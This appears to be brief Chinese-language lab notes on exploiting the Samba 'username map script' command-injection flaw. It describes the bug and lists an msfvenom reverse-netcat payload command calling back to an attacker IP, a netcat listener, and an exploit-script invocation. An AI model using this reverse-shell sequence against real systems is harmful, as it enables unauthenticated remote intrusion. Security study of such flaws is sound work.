该模块利用了 Samba 3.0.20 至 3.0.25rc3 版本中,在使用非默认的 "username map script" 配置选项时存在的命令执行漏洞。通过指定包含 shell 元字符的用户名,攻击者可以执行任意命令。由于该选项用于在认证之前映射用户名,因此利用此漏洞无需认证!
msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.56 LPORT=5555 -f python
nc -nlvp 5555
python3 smbusermap.py <Target IP>
